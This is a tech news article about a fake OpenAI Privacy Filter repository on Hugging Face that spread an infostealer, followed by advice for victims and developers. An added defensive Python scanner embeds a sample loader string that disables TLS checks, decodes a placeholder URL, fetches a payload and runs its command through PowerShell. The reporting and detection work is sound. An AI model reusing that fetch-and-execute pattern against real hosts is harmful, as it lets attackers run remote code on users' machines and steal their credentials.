Fake OpenAI repository on Hugging Face spreads infostealer malware

By Craig Nash
Tech writer at All Things Geek. Covers artificial intelligence, semiconductors, and computing hardware.

Malware hosted on Hugging Face has become a serious threat to developers who trust the popular AI model repository. A fake OpenAI repository named “Open-OSS/privacy-filter” impersonated OpenAI’s legitimate Privacy Filter project, reaching the platform’s #1 trending position before HiddenLayer researchers discovered it was distributing infostealer malware on May 7, 2024. The malicious repository accumulated 244,000 downloads and 667 likes before Hugging Face removed it following the security team’s report.

Key Takeaways

  • Fake repository typosquatted OpenAI’s Privacy Filter project and copied its model card nearly verbatim.
  • Reached #1 on Hugging Face trending list with 244,000 downloads before removal.
  • Contained loader.py script deploying Rust-based infostealer targeting browser credentials, Discord tokens, and crypto wallets.
  • HiddenLayer linked infrastructure to other malicious repositories and npm typosquatting campaigns.
  • Majority of 667 likes appear auto-generated, suggesting artificial popularity inflation.

How the Hugging Face Malware Attack Worked

The malicious repository used a deceptively simple execution chain to compromise Windows systems. The loader.py file contained fake AI-related code designed to appear harmless to casual inspection, but it disabled SSL verification, decoded a base64-encoded URL, and fetched a JSON payload from an external resource. Once the payload arrived, the script executed a PowerShell command chain that deployed and ran a Rust-based infostealer malware. This multi-stage approach gave attackers flexibility to update their payload without modifying the repository itself.

The infostealer targeted sensitive data across multiple attack surfaces. It harvested browser credentials, Discord tokens, cryptocurrency wallet information, SSH/FTP/VPN configurations, and system data before exfiltrating everything to a command-and-control server. The malware included extensive anti-analysis features to evade detection by security researchers and automated scanners, making it harder to reverse-engineer and understand the full scope of the threat.
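As an added defensive example (not code from the article, HiddenLayer, or the repository itself), the following Python script statically scans a Python source file for the three loader traits described above: TLS verification disabled, a base64-encoded string literal that decodes to a URL, and a PowerShell invocation from Python. The sample input is constructed to mirror that pattern with a placeholder URL; it is only parsed, never executed.

```python
import ast
import base64
import re

# Constructed sample mimicking the loader pattern described above: the URL is a
# placeholder and this text is only parsed by scan_loader, never executed.
_ENCODED = base64.b64encode(b"https://example.invalid/payload.json").decode()
SAMPLE_LOADER = f'''
import ssl, json, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("{_ENCODED}").decode()
payload = json.loads(urllib.request.urlopen(url).read())
subprocess.run(["powershell", "-Command", payload["cmd"]])
'''

def _call_name(node):
    """Dotted name of a call target, e.g. 'base64.b64decode'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def scan_loader(source):
    """Return the loader indicators found in Python source (empty list if none)."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        # 1. TLS certificate verification disabled via an unverified SSL context
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.add("tls-verification-disabled")
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node.func)
        # 2. base64 string literal that decodes to a URL (hidden download location)
        if name.endswith("b64decode") and node.args and isinstance(node.args[0], ast.Constant):
            try:
                decoded = base64.b64decode(str(node.args[0].value), validate=True).decode()
            except ValueError:
                decoded = ""
            if re.match(r"https?://", decoded):
                findings.add("obfuscated-url:" + decoded)
        # 3. PowerShell launched from Python (subprocess or os.system)
        if name in ("subprocess.run", "subprocess.Popen", "subprocess.call", "os.system"):
            literals = [c.value for c in ast.walk(node) if isinstance(c, ast.Constant)]
            if any(isinstance(s, str) and "powershell" in s.lower() for s in literals):
                findings.add("powershell-execution")
    return sorted(findings)
```

Run `scan_loader(open(path).read())` over each `.py` file in a downloaded repository before executing anything; any non-empty result warrants manual review.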

Why Hugging Face Became a Malware Distribution Vector

The attack exploited fundamental trust dynamics within the AI developer community. OpenAI’s legitimate Privacy Filter is a real project for filtering sensitive data in AI training, giving the fake repository credibility at first glance. By copying the model card nearly verbatim, attackers leveraged Hugging Face’s own documentation system against the platform. The repository’s rapid climb to #1 trending status exposed a critical gap in platform moderation—artificial popularity inflation through auto-generated likes and downloads went undetected until researchers manually investigated.

This incident reflects a broader vulnerability in AI platforms as malware distribution channels. Unlike traditional software repositories with stricter code review processes, Hugging Face prioritizes accessibility and rapid community contribution. While that openness benefits legitimate researchers, it also lowers barriers for attackers. The fact that 667 likes came primarily from auto-generated accounts suggests sophisticated automation was used to game the trending algorithm itself, making the malicious repository appear more legitimate and trustworthy.

Connected Infrastructure and Broader Threat Landscape

HiddenLayer researchers linked the malicious Hugging Face repository to other attack infrastructure, uncovering a coordinated campaign spanning multiple platforms. The same threat actors behind this repository operated other malicious Hugging Face repositories and conducted a separate npm typosquatting campaign distributing the “WinOS 4.0” implant. This pattern suggests an organized operation with resources to maintain multiple attack vectors simultaneously.

The broader context includes earlier discoveries of malicious ML models on Hugging Face using different techniques. ReversingLabs identified malicious repositories in January 2024 exploiting the “nullifAI” technique, which abused Pickle file serialization in Python to hide malicious code within model files. Those repositories (glockr1/ballr7 and who-r-u0000/0000000000000000000000000000000000000) were not initially flagged by Hugging Face’s automated scanners and remained live for 24 hours after being reported. These incidents demonstrate that attackers are actively experimenting with multiple malware delivery mechanisms on the platform.

What Developers Need to Know

The exact victim count from this campaign remains unclear, but the 244,000 downloads represent a significant exposure window. Developers who downloaded the fake repository during its 48 hours at #1 trending should assume potential compromise if they executed the code on Windows systems. The infostealer’s targets—browser credentials, Discord tokens, and cryptocurrency wallets—suggest attackers were after both personal data and financial assets. Anyone who downloaded the repository should change passwords for affected accounts, rotate API keys, and check for unauthorized access to cryptocurrency wallets and Discord accounts.

Hugging Face has taken steps to remove the malicious repository and presumably tightened detection, but the incident highlights why developers must verify project authenticity before downloading. Check official GitHub repositories, verify maintainer accounts against known community members, and be skeptical of newly trending projects with limited history. The Privacy Filter project’s legitimate status made the typosquatting effective—attackers banked on developers trusting the name without verifying the source.

Has Hugging Face improved its security since this incident?

Hugging Face removed the malicious repository and responded to HiddenLayer’s report, but the platform has not publicly detailed specific detection improvements. The fact that auto-generated likes and downloads reached such scale before detection suggests ongoing gaps in behavioral analysis and anomaly detection systems. Developers should continue treating Hugging Face downloads with the same caution they would apply to any third-party code source.

How can developers verify a Hugging Face repository is legitimate?

Cross-reference the repository URL with official sources from the project’s website or verified social media accounts. Check the maintainer’s profile history and community reputation. Be wary of repositories with sudden spikes in downloads or likes, especially from new accounts. For critical projects like OpenAI’s tools, always verify through OpenAI’s official GitHub organization or documentation before downloading.

What should I do if I downloaded the fake OpenAI repository?

If you executed the loader.py file on a Windows system, assume potential compromise and immediately change all passwords, particularly for email, banking, and cryptocurrency accounts. Disconnect the affected machine from networks with sensitive data, run updated antivirus scans, and consider a full OS reinstall if the system had access to sensitive credentials. For less critical systems, monitor for suspicious activity and enable two-factor authentication on all accounts accessed from that machine.

The Hugging Face malware incident exposes a hard truth: popularity and trending status are not security assurances. As AI platforms become central infrastructure for developers worldwide, attackers will continue exploiting trust dynamics and platform mechanics to distribute malware at scale. The responsibility for verification ultimately falls on individual developers—verify sources, scrutinize downloads, and assume nothing is safe until independently confirmed.

Edited by the All Things Geek team.

Source: TechRadar
